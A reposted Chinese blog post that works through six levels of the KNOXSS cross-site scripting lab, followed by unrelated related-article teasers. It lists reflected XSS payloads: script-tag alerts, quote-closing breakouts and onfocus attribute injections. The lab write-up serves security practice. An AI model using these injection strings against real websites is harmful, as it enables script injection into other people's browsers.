XSS靶場實戰（工作wuwuwu）

XSS靶場實戰（工作wuwuwu）

web/2025/7/6 18:30:26/文章來源:https://blog.csdn.net/m0_74317362/article/details/147606804

knoxss

knoxss

Single Reflection Using QUERY of URL

——01

在這里插入圖片描述

測試標簽

<script>alert(666666)</script>

在這里插入圖片描述

——02: "

在這里插入圖片描述

在這里插入圖片描述

<h1>test</h1>

在這里插入圖片描述
沒有反應，查看源碼

現在需要閉合雙引號，我計劃還是先搞標簽

"><h1>test</h1>

在這里插入圖片描述
標簽上：

"><script>alert(666666)</script>

在這里插入圖片描述

——03: ’

在這里插入圖片描述

<h1>test</h1>

在這里插入圖片描述

閉合"，"被實體編碼
在這里插入圖片描述

'閉合
在這里插入圖片描述

'>來閉合

'><h1>test</h1>

在這里插入圖片描述
不多的時候：

標簽上：

'><script>alert(666666)</script>

在這里插入圖片描述

——04：" + input屬性

在這里插入圖片描述

<h1>test</h1>

在這里插入圖片描述

"閉合
在這里插入圖片描述
發現"閉合了，但是標簽無法被閉合，只能看屬性

找到 input 對應的xss屬性

<input autofocus onfocus=alert(1)>

使用

"autofocus onfocus=alert(1) b="

在這里插入圖片描述
刷新頁面就觸發！

——05: ’ + input

在這里插入圖片描述

"閉合

‘閉合
在這里插入圖片描述
閉合，但是 > 被實體編碼

屬性

' autofocus onfocus=alert(1) b="

'后面是否有空格都行
在這里插入圖片描述

——06

頁面看不到
在這里插入圖片描述
①源碼搜索到：

再去前面找到對應的，未來edit as html

②直接搜索也可（ctrl + F）
在這里插入圖片描述

<h1>test</h1>

在這里插入圖片描述

"閉合
在這里插入圖片描述

使用屬性

" autofocus onfocus=alert(1) b="

在這里插入圖片描述
自己賦值了

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/web/77711.shtml
繁體地址，請注明出處：http://hk.pswp.cn/web/77711.shtml
英文地址，請注明出處：http://en.pswp.cn/web/77711.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！

相關文章

基于 BERT 微調一個意圖識別（Intent Classification）模型

基于 BERT 微調一個意圖識別（Intent Classification）模型

基于 BERT 微調一個意圖識別（Intent Classification）模型，你的意圖類別包括： 查詢天氣獲取新聞咨詢想聽音樂想添加備忘查詢備忘獲取家政服務結束對話增加音量減小音量其他具體實現步驟（詳細版） 1. 準備你…

閱讀更多...

SSM書籍管理（環境搭建）

SSM書籍管理（環境搭建）

整合SSM：SpringSpringMVCMybatis 環境要求：IDEA、MySQL5、Tomcat9、Maven3 數據庫搭建數據庫準備以下數據用于后續實驗：創建一個ssmbuild數據庫，表books，該表有4個字段，并且插入3條數據用于后續。 CRE…

閱讀更多...

API文檔生成與測試工具推薦

API文檔生成與測試工具推薦

在API開發過程中，文檔的編寫和維護是一項重要但繁瑣的工作。為了提高效率，許多開發者會選擇使用API文檔自動生成工具或具備API文檔生成功能的API門戶產品。選擇能導入API文檔的工具生成測試腳本, 本文將全面梳理市面上符合OpenAPI 3.0規范的文檔生成工具…

閱讀更多...

linux修改環境變量

linux修改環境變量

添加環境變量注意事項。 vim ~/.bashrc 添加環境變量時，需要source ~/.bashrc后才能有效。同時只對當前shell窗口有效，當打開另外的shell窗口時，需要重新source才能起效。 1.修改bashrc文件后 2.source后打開另一個shell窗口則無效&#xff…

閱讀更多...

springboot項目中，MySQL數據庫轉達夢數據庫

springboot項目中，MySQL數據庫轉達夢數據庫

前言前段時間，公司要求要把某幾個項目的數據庫換成達夢數據庫，說是為了國產化。我就挺無語的，三四年的項目了，現在說要換數據庫。我一開始以為這個達夢數據庫應該是和TIDB差不多的。我之前做的好幾個項目部署到測試服、正式服…

閱讀更多...

【Quest開發】透視環境下摳出身體并能遮擋身體上的服裝

【Quest開發】透視環境下摳出身體并能遮擋身體上的服裝

軟件：Unity 2022.3.51f1c1、vscode、Meta XR All in One SDK V72 硬件：Meta Quest3 僅針對urp管線博主搞這個主要是想做現實里的人的變身功能，最后效果如下可以看到雖然身體是半透明的，但是裙子依舊被完全遮擋了原理是參考…

閱讀更多...

前端安全中的XSS（跨站腳本攻擊）

前端安全中的XSS（跨站腳本攻擊）

XSS 類型存儲型 XSS 特征：惡意腳本存儲在服務器（如數據庫），用戶訪問受感染頁面時觸發。場景：用戶評論、論壇帖子等持久化內容。影響范圍：所有訪問該頁面的用戶。反射型 XSS 特征：惡意腳本通過…

閱讀更多...

（第三篇）Springcloud之Ribbon負載均衡

（第三篇）Springcloud之Ribbon負載均衡

一、簡介 1、介紹 Spring Cloud Ribbon是Netflix發布的開源項目，是基于Netflix Ribbon實現的一套客戶端負載均衡的工具。主要功能是提供客戶端的軟件負載均衡算法，將Netflix的中間層服務連接在一起。Ribbon客戶端組件提供一系列完善的配置項如連接超時&…

閱讀更多...

大模型——使用coze搭建基于DeepSeek大模型的智能體實現智能客服問答

大模型——使用coze搭建基于DeepSeek大模型的智能體實現智能客服問答

大模型——使用coze搭建基于DeepSeek大模型的智能體實現智能客服問答本章實驗完全依托于coze在線平臺，不需要本地部署任何應用。實驗介紹 1.coze介紹扣子（coze）是新一代 AI 應用開發平臺。無論你是否有編程基礎，都可以在扣子上快速搭建基于大模型的各類 AI 應用，并…

閱讀更多...

【計算機視覺】目標檢測：深度解析YOLOv9：下一代實時目標檢測架構的創新與實戰

【計算機視覺】目標檢測：深度解析YOLOv9：下一代實時目標檢測架構的創新與實戰

深度解析YOLOv9：下一代實時目標檢測架構的創新與實戰架構演進與技術創新YOLOv9的設計哲學核心創新解析1. 可編程梯度信息（PGI）2. 廣義高效層聚合網絡（GELAN）3. 輕量級設計環境配置與快速開始硬件需求建議詳細安裝步驟…

閱讀更多...

【SpringBoot】基于MybatisPlus的博客管理系統（1）

【SpringBoot】基于MybatisPlus的博客管理系統（1）

1.準備工作 1.1數據庫 -- 建表SQL create database if not exists java_blog_spring charset utf8mb4;use java_blog_spring; -- 用戶表 DROP TABLE IF EXISTS java_blog_spring.user_info; CREATE TABLE java_blog_spring.user_info(id INT NOT NULL AUTO_INCREMENT,user_na…

閱讀更多...

貴族運動項目有哪些·棒球1號位

貴族運動項目有哪些·棒球1號位

10個具有代表性的貴族運動： 高爾夫馬術網球帆船擊劍斯諾克冰球私人飛機駕駛深海潛水馬球貴族運動通常指具有較高參與成本、歷史底蘊或社交屬性的運動，而棒球作為一項大眾化團隊運動，與典型貴族運動的結合較為罕見。從以下幾個角度探…

閱讀更多...

【Tauri2】035——sql和sqlx

【Tauri2】035——sql和sqlx

前言這篇就來看看插件sql SQL | Taurihttps://tauri.app/plugin/sql/ 正文準備添加依賴 tauri-plugin-sql {version "2.2.0",features ["sqlite"]} features可以是mysql、sqlite、postsql 進去features看看 sqlite ["sqlx/sqlite&quo…

閱讀更多...

全鏈路自動化AIGC內容工廠：構建企業級智能內容生產系統

全鏈路自動化AIGC內容工廠：構建企業級智能內容生產系統

一、工業化AIGC系統架構 1.1 生產流程設計 [需求輸入] → [創意生成] → [多模態生產] → [質量審核] → [多平臺分發] ↑ ↓ ↑ [用戶反饋] ← [效果分析] ← [數據埋點] ← [內容投放] 1.2 技術指標要求指標標準值實現方案單日產能 1,000,000 分布式推理集群內容合規率…

閱讀更多...

是否想要一個桌面哆啦A夢的寵物

是否想要一個桌面哆啦A夢的寵物

是否想擁有一個在指定時間喊你的桌面寵物呢（手動狗頭） 如果你有更好的想法，歡迎提出你的想法。是否考慮過跟開發者一對一，提出你的建議（狗頭）。 https://wwxc.lanzouo.com/idKnJ2uvq11c 密碼:bbkm

閱讀更多...

Unity AI-使用Ollama本地大語言模型運行框架運行本地Deepseek等模型實現聊天對話（二）

Unity AI-使用Ollama本地大語言模型運行框架運行本地Deepseek等模型實現聊天對話（二）

一、使用介紹官方網頁：Ollama官方網址中文文檔參考：Ollama中文文檔相關教程：Ollama教程使用版本：Unity 2022.3.53f1c1、Ollama 0.6.2 示例模型：llama3.2 二、運行示例三、使用步驟 1、創建Canvas面板具體…

閱讀更多...

從 BERT 到 GPT：Encoder 的 “全局視野” 如何喂飽 Decoder 的 “逐詞糾結”

從 BERT 到 GPT：Encoder 的 “全局視野” 如何喂飽 Decoder 的 “逐詞糾結”

當 Encoder 學會 “左顧右盼”：Decoder 如何憑 “單向記憶” 生成絲滑文本？ 目錄當 Encoder 學會 “左顧右盼”：Decoder 如何憑 “單向記憶” 生成絲滑文本？引言一、Encoder vs Decoder：核心功能與基礎架構對比1.1 本…

閱讀更多...

數據結構入門：詳解順序表的實現與操作

數據結構入門：詳解順序表的實現與操作

目錄 1.線性表 2.順序表 2.1概念與結構 2.2分類 2.2.1靜態順序表 2.2.2動態順序表 3.動態順序表的實現 3.1.SeqList.h 3.2.SeqList.c 3.2.1初始化 3.2.2銷毀 3.2.3打印 3.2.4順序表擴容 3.2.5尾部插入及尾部刪除 3.2.6頭部插入及頭部刪除 3.2.7特定位置插入…

閱讀更多...

LeetCode熱題100--53.最大子數組和--中等

LeetCode熱題100--53.最大子數組和--中等

1. 題目給你一個整數數組 nums ，請你找出一個具有最大和的連續子數組（子數組最少包含一個元素），返回其最大和。子數組是數組中的一個連續部分。示例 1： 輸入：nums [-2,1,-3,4,-1,2,1,-5,4] 輸出&…

閱讀更多...

python:練習：2

python:練習：2

1.題目：統計一篇英文文章中每個單詞出現的次數，并按照出現次數排序輸出。示例輸入： text "Python is an interpreted, high-level, general-purpose programming language. Created by Guido van Rossum and first released in 1991…

閱讀更多...

最新文章